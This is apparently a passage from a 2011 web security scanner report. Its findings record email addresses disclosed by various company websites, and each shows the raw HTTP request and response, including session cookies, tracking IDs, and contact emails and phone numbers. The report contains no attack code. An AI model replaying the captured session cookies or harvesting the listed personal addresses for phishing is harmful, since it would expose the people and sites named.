Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v; ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:03 GMT
Content-Length: 5910


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >


<script language="javascript">
   if (
...[SNIP]...
<A href="mailto:support@sungarddx.com"><U><A href="mailto:Investran.DXSupport@sungard.com">Investran.DXSup</U>port@sungard.com</A>
...[SNIP]...

22.28. http://translate.googleapis.com/translate_a/t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following email address was disclosed in the response:

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://honey.digiware.net/
Origin: http://honey.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1400

q=Colombian%20HoneyNet%20Project&q=Un%20Cap%C3%ADtulo%20de%20Honeynet%20Project&q=Search&q=Home&q=About&q=Pages&q=About&q=Archives&q=August%202010&q=June%202010&q=Categories&q=%3Ca%20i%3D0%3EArticulos
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:17 GMT
Expires: Thu, 12 May 2011 13:07:17 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=7f6e1447059fbca4:TM=1305205637:LM=1305205637:S=tQmIDboQEPIYiGYZ; expires=Sat, 11-May-2013 13:07:17 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1102

["Colombian Honeynet Project","A Chapter of the Honeynet Project","Search","Home","About","Pages","About","Archives","August 2010","June 2010","Categories","\x3ca i=0\x3eArticles\x3c/a\x3e \x3ca i=1\x
...[SNIP]...
ng email and focused job site referring to \x26quot;elempleo.com\x26quot; through an email that states the following:","\x3ca i=0\x3eFrom:\x3c/a\x3e \x3ca i=1\x3eAbigail Danae Lizana Gonzales [mailto: danaeabiga@danaeabigail.com]\x3c/a\x3e","\x3ca i=0\x3eSent:\x3c/a\x3e \x3ca i=1\x3eSunday, January 18, 2009 3:29 pm\x3c/a\x3e","\x3ca i=0\x3eTo:\x3c/a\x3e \x3ca i=1\x3eXXXXXXXXXX\x3c/a\x3e","\x3ca i=0\x3eSubject:\x3c/a\x3e \x3ca
...[SNIP]...

22.29. http://translate.googleapis.com/translate_a/t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following email addresses were disclosed in the response:

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/index.php?option=com_wrapper&view=wrapper&Itemid=82
Origin: http://www.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 936

q=%0ATel.%3A%3A%20(51)%201-6522307&q=%0AFax%3A%20(51)%20-%201-6381584&q=%0ALima%2C%20Per%C3%BA%20&q=info-pe%40digiware.net&q=DIGIWARE%20ECUADOR&q=%0AIgnacio%20San%20mar%C3%ADa%20No.%20E3-30%20y%20Nu%C
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:47 GMT
Expires: Thu, 12 May 2011 13:07:47 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=4d055b353f0bfe86:TM=1305205667:LM=1305205667:S=KAqwcEu987gI1Cyx; expires=Sat, 11-May-2013 13:07:47 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 774

["\nTel: (51) 1-6522307","\nFax: (51) - 1-6381584","\nLima, Peru ","info-pe@digiware.net","ECUADOR DIGIWARE","\nIgnacio San Maria No. E3-30 and Nu..ez de Vela, Metropolis Building, Mezzanine 8. ","\nTel: (593) 2243 5434 ","\nFax: (593) - 2225 4296 ","\nQuito, Ecuador ","San Jorge No. 105 Avenue and Ninth Street., Delta Building, Room 212.","\nTel / fax: (593) 4228 2940","\nGuayaquil, Ecuador ","info-ec@digiware.net"," Toll Free ","\nGuayaquil: 1-999-170 ","\nEcuador :1-800-999-190 - pin 6241 ","DIGIWARE USA","\n1111 Brickell Avenue, 11th Floor","\n\x3ci\x3eMiami, FL 33131.\x3c/i\x3e \x3cb\x3eMiami, FL 33131.\x3c/b\x3e \x3ci\x3eUSA\x3c/i\x3e \x3cb\x3eUSA\x3c/b\x3e","Tel: (305) 913-8569","\nFax.: (305) 913-4101","info-usa@digiware.net","CONTACT U.S.","CONTACT U.S."]

22.30. http://translate.googleapis.com/translate_a/t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following email addresses were disclosed in the response:

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/index.php?option=com_wrapper&view=wrapper&Itemid=82
Origin: http://www.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1424

q=%3Ca%20i%3D0%3EQUIENES%20SOMOS%3C%2Fa%3E%3Ca%20i%3D1%3EDIGISERT%3C%2Fa%3E%3Ca%20i%3D2%3ESOPORTE%3C%2Fa%3E%3Ca%20i%3D3%3EEMPLEO%3C%2Fa%3E%3Ca%20i%3D4%3ESERVICIO%20AL%20CLIENTE%3C%2Fa%3E%3Ca%20i%3D5%3
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:44 GMT
Expires: Thu, 12 May 2011 13:07:44 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=7b585fd0ad932d7a:TM=1305205664:LM=1305205664:S=gBcCMR9hs3gJsHbC; expires=Sat, 11-May-2013 13:07:44 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1363

["\x3ca i=0\x3eABOUT\x3c/a\x3e \x3ca i=1\x3eDIGISERT\x3c/a\x3e \x3ca i=2\x3eSUPPORT\x3c/a\x3e \x3ca i=3\x3eJOBS\x3c/a\x3e \x3ca i=4\x3eCUSTOMER SERVICE\x3c/a\x3e \x3ca i=5\x3eCONTACT U.S.\x3c/a\x3e","
...[SNIP]...
mpany:","E-Mail:","Phone:","Your comment is very important to us:","submit","CHILE DIGIWARE","Alcantara 200, Piso 6","Las Condes ","Tel: (56 2) 370 29 43 ","Fax.: (56 2) 369 56 57 ","Santiago, Chile","info-ch@digiware.net","COLOMBIA DIGIWARE","\n\x3ci\x3eCalle 100 No. 13 -21 Of.\x3c/i\x3e \x3cb\x3eCalle 100 No. 13 -21 Of.\x3c/b\x3e \x3ci\x3e301\x3c/i\x3e \x3cb\x3e301\x3c/b\x3e ","\nTel: (57) 1-508 2220 ","\n\x3ci\x3eFa
...[SNIP]...
r No. 42-70.\x3c/b\x3e \x3ci\x3eTorre 2 Ofic 1016\x3c/i\x3e \x3cb\x3e1016 Tower 2 Ofic\x3c/b\x3e ","\n(57) 4-6040465 - (57) 4-6040467","\nMedellin, Colombia","International Phone: +1 (786) 924-3806 ","info@digiware.net","PERU DIGIWARE","\nOffice 1121 Av Camino Real 711 San Isidro "]

22.31. http://w.sharethis.com/button/buttons.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:26:10 GMT
ETag: "3067b-9ecb-4a29ec924b080"
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Thu, 12 May 2011 12:36:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40651

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

22.32. https://ww3.janus.com/advisor/js/modalbox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww3.janus.com
Path:   /advisor/js/modalbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /advisor/js/modalbox.js HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Server:
ETag: W/"28789-1304985196506"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: text/javascript
Date: Thu, 12 May 2011 11:15:43 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 28789

var arContentLabel = "";

function showOverlay(name, contentLabel, linkRef)
{
   var url = "";
   var forwardURL = null;
   var width = 450;
   arContentLabel = (contentLabel != null) ? contentLabel : "";
   sw
...[SNIP]...
ideoid=" + videoid, {title:false, transitions: false, width: wWidth});
}


/*
ModalBox - The pop-up window thingie with AJAX, based on prototype and script.aculo.us.

Copyright Andrey Okonetchnikov (andrej.okonetschnikow@gmail.com), 2006-2007
All rights reserved.

VERSION 1.6.0
Last Modified: 12/13/2007
*/

if (!window.Modalbox)
   var Modalbox = new Object();

Modalbox.Methods = {
   overrideAlert: false, // Override standard bro
...[SNIP]...

22.33. https://ww3.janus.com/advisor/js/validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww3.janus.com
Path:   /advisor/js/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /advisor/js/validation.js HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Server:
ETag: W/"10728-1304985196521"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: text/javascript
Date: Thu, 12 May 2011 11:15:43 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10728

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew
...[SNIP]...
a valid date.', function(v) {
               var test = new Date(v);
               return Validation.get('IsEmpty').test(v) || !isNaN(test);
           }],
   ['validate-email', 'Please enter a valid email address. For example fred@domain.com .', function (v) {
               return Validation.get('IsEmpty').test(v) || /\w{1,}[@][\w\-]{1,}([.]([\w\-]{1,})){1,3}$/.test(v)
           }],
   ['validate-url', 'Please enter a valid URL.', function (v) {
               ret
...[SNIP]...

22.34. http://www.ams-legal.com/services_and_support.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ams-legal.com
Path:   /services_and_support.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /services_and_support.asp HTTP/1.1
Host: www.ams-legal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ams-legal.com/
Cookie: ASPSESSIONIDQCDBQTBR=FNMNHADBMFJOPANMPFFMINHD; __utma=96668943.780464326.1305203529.1305203529.1305203529.1; __utmb=96668943.1.10.1305203529; __utmc=96668943; __utmz=96668943.1305203529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5316
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="mailto:support@ams-legal.com">support@ams-legal.com</a>
...[SNIP]...
<a href="mailto:training@ams-legal.com">training@ams-legal.com</a>
...[SNIP]...
<a href="mailto:services@ams-legal.com">services@ams-legal.com</a>
...[SNIP]...

22.35. http://www.apolloglobal.us/templates/global/js/roksameheight.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apolloglobal.us
Path:   /templates/global/js/roksameheight.js

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/global/js/roksameheight.js HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
Referer: http://www.apolloglobal.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: b01a8bbc2b6e57a153d5c05069526f2b=93f4b5ee63e125f5d13d6f1a57f43699

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:31:14 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
Last-Modified: Fri, 16 Jan 2009 15:08:58 GMT
ETag: "b102e-205-f3c75680"
Accept-Ranges: bytes
Content-Length: 517
Content-Type: application/x-javascript

/*
Get the maximum height from divs with passed class as argument
Djamil Legato <djamil@djamil.it>
For Andy Miller
*/

var maxHeight = function(classname) {
var divs = document.
...[SNIP]...

22.36. http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

Issue detail

The following email address was disclosed in the response:

Request

GET /news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; opt=no-opt; __utma=30057196.790518761.1303930135.1303930135.1303930135.1; __utmv=30057196.|3=opt=no-opt=1,; rsi_segs=K05539_10529|K05539_10592; _chartbeat2=05vt53emlalrxzsu

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Vary: Accept-Encoding
ETag: W/"683e1b09b50f1132fee8e0b7794a5e52"
X-runtime: 1022
Content-Type: text/html; charset=utf-8
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: private, max-age=356
Date: Thu, 12 May 2011 11:37:04 GMT
Connection: close
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="mailto:jkelly101@bloomberg.net" title="Send E-mail" density="mailto">jkelly101@bloomberg.net</a>
...[SNIP]...

22.37. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_01ov.jpg">
...[SNIP]...

22.38. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_02ov.jpg">
...[SNIP]...

22.39. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_03ov.jpg">
...[SNIP]...

22.40. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_04ov.jpg">
...[SNIP]...

22.41. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_05ov.jpg">
...[SNIP]...

22.42. http://www.condorlabs.net/wp-content/themes/idream/js/jquery.pngFix.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.condorlabs.net
Path:   /wp-content/themes/idream/js/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /wp-content/themes/idream/js/jquery.pngFix.js HTTP/1.1
Host: www.condorlabs.net
Proxy-Connection: keep-alive
Referer: http://www.condorlabs.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:25:14 GMT
Server: Apache
Last-Modified: Fri, 02 Apr 2010 10:59:22 GMT
ETag: "1c102f5-12ac-4833edf281680"
Accept-Ranges: bytes
Content-Length: 4780
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:

...[SNIP]...
from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

22.43. http://www.conferenceservers.com/brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.conferenceservers.com
